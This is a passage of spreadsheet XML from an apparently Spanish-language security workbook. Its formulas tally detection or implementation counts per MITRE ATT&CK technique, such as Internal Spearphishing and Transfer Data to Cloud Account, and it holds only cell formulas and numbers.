        <v>1</v>
      </c>
      <c r="Y51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>2</v>
      </c>
      <c r="Z51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>1</v>
      </c>
      <c r="AA51" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (2)</v>
      </c>
      <c r="AB51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC51" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>5</v>
      </c>
      <c r="AF51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>3</v>
      </c>
      <c r="AG51" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (5)</v>
      </c>
      <c r="AH51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>3</v>
      </c>
      <c r="AI51" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>7</v>
      </c>
      <c r="AL51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>4</v>
      </c>
      <c r="AM51" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (7)</v>
      </c>
      <c r="AN51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>4</v>
      </c>
      <c r="AO51" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>3</v>
      </c>
      <c r="AQ51" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR51" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS51" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT51" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU51" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY51" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ51" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA51" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC51" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>2</v>
      </c>
      <c r="BD51" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>1</v>
      </c>
      <c r="BE51" s="4" t="str">
        <f t="shared" si="8"/>
        <v>1 (2)</v>
      </c>
      <c r="BF51" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>1</v>
      </c>
      <c r="BG51" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI51" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>3</v>
      </c>
      <c r="BJ51" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>2</v>
      </c>
      <c r="BK51" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL51" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM51" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO51" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>7</v>
      </c>
      <c r="BP51" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>6</v>
      </c>
      <c r="BQ51" s="4" t="str">
        <f t="shared" si="10"/>
        <v>6 (7)</v>
      </c>
      <c r="BR51" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS51" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT51" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>3</v>
      </c>
      <c r="BV51" s="292">
        <v>3</v>
      </c>
      <c r="BW51" s="322">
        <v>3</v>
      </c>
      <c r="BX51" s="4" t="str">
        <f t="shared" si="11"/>
        <v>3 (3)</v>
      </c>
      <c r="BY51" s="12">
        <v>2</v>
      </c>
      <c r="BZ51" s="13">
        <v>1</v>
      </c>
      <c r="CA51" s="394">
        <v>2</v>
      </c>
      <c r="CB51" s="288">
        <v>6</v>
      </c>
      <c r="CC51" s="4">
        <v>5</v>
      </c>
      <c r="CD51" s="4" t="str">
        <f t="shared" si="12"/>
        <v>5 (6)</v>
      </c>
      <c r="CE51" s="4">
        <v>2</v>
      </c>
      <c r="CF51" s="4">
        <v>1</v>
      </c>
      <c r="CG51" s="13">
        <v>1</v>
      </c>
      <c r="CH51" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="52" spans="1:86" ht="15" customHeight="1">
      <c r="A52" s="4">
        <f t="shared" si="13"/>
        <v>50</v>
      </c>
      <c r="B52" s="4" t="str">
        <f>IFERROR(VLOOKUP(A52,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1534</v>
      </c>
      <c r="C52" s="493" t="str">
        <f>IFERROR(VLOOKUP(B52,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Internal Spearphishing</v>
      </c>
      <c r="D52" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B52)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E52" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F52" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (10)</v>
      </c>
      <c r="G52" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>12</v>
      </c>
      <c r="H52" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>8</v>
      </c>
      <c r="I52" s="322" t="str">
        <f t="shared" si="0"/>
        <v>8 (12)</v>
      </c>
      <c r="J52" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K52" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>5</v>
      </c>
      <c r="M52" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N52" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O52" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P52" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q52" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S52" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>12</v>
      </c>
      <c r="T52" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>8</v>
      </c>
      <c r="U52" s="4" t="str">
        <f t="shared" si="2"/>
        <v>8 (12)</v>
      </c>
      <c r="V52" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="W52" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>5</v>
      </c>
      <c r="Y52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>34</v>
      </c>
      <c r="Z52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>13</v>
      </c>
      <c r="AA52" s="322" t="str">
        <f t="shared" si="3"/>
        <v>13 (34)</v>
      </c>
      <c r="AB52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="AC52" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>6</v>
      </c>
      <c r="AE52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>9</v>
      </c>
      <c r="AF52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>7</v>
      </c>
      <c r="AG52" s="322" t="str">
        <f t="shared" si="4"/>
        <v>7 (9)</v>
      </c>
      <c r="AH52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>3</v>
      </c>
      <c r="AI52" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>4</v>
      </c>
      <c r="AK52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>43</v>
      </c>
      <c r="AL52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>20</v>
      </c>
      <c r="AM52" s="322" t="str">
        <f t="shared" si="5"/>
        <v>20 (43)</v>
      </c>
      <c r="AN52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>11</v>
      </c>
      <c r="AO52" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>9</v>
      </c>
      <c r="AQ52" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR52" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS52" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT52" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU52" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>19</v>
      </c>
      <c r="AX52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY52" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (19)</v>
      </c>
      <c r="AZ52" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>3</v>
      </c>
      <c r="BA52" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>3</v>
      </c>
      <c r="BC52" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>31</v>
      </c>
      <c r="BD52" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>11</v>
      </c>
      <c r="BE52" s="4" t="str">
        <f t="shared" si="8"/>
        <v>11 (31)</v>
      </c>
      <c r="BF52" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>6</v>
      </c>
      <c r="BG52" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>6</v>
      </c>
      <c r="BI52" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ52" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK52" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL52" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM52" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO52" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>10</v>
      </c>
      <c r="BP52" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>10</v>
      </c>
      <c r="BQ52" s="4" t="str">
        <f t="shared" si="10"/>
        <v>10 (10)</v>
      </c>
      <c r="BR52" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS52" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT52" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU52" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>10</v>
      </c>
      <c r="BV52" s="292">
        <v>0</v>
      </c>
      <c r="BW52" s="322">
        <v>0</v>
      </c>
      <c r="BX52" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY52" s="12">
        <v>0</v>
      </c>
      <c r="BZ52" s="13">
        <v>0</v>
      </c>
      <c r="CA52" s="394">
        <v>0</v>
      </c>
      <c r="CB52" s="288">
        <v>0</v>
      </c>
      <c r="CC52" s="4">
        <v>0</v>
      </c>
      <c r="CD52" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE52" s="4">
        <v>0</v>
      </c>
      <c r="CF52" s="4">
        <v>0</v>
      </c>
      <c r="CG52" s="13">
        <v>0</v>
      </c>
      <c r="CH52" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:86" ht="15" customHeight="1">
      <c r="A53" s="4">
        <f t="shared" si="13"/>
        <v>51</v>
      </c>
      <c r="B53" s="4" t="str">
        <f>IFERROR(VLOOKUP(A53,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1537</v>
      </c>
      <c r="C53" s="493" t="str">
        <f>IFERROR(VLOOKUP(B53,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Transfer Data to Cloud Account</v>
      </c>
      <c r="D53" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B53)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E53" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>76</v>
      </c>
      <c r="F53" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (76)</v>
      </c>
      <c r="G53" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>25</v>
      </c>
      <c r="H53" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>25</v>
      </c>
      <c r="I53" s="322" t="str">
        <f t="shared" si="0"/>
        <v>25 (25)</v>
      </c>
      <c r="J53" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>4</v>
      </c>
      <c r="K53" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>8</v>
      </c>
      <c r="M53" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N53" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O53" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P53" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q53" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S53" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>25</v>
      </c>
      <c r="T53" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>25</v>
      </c>
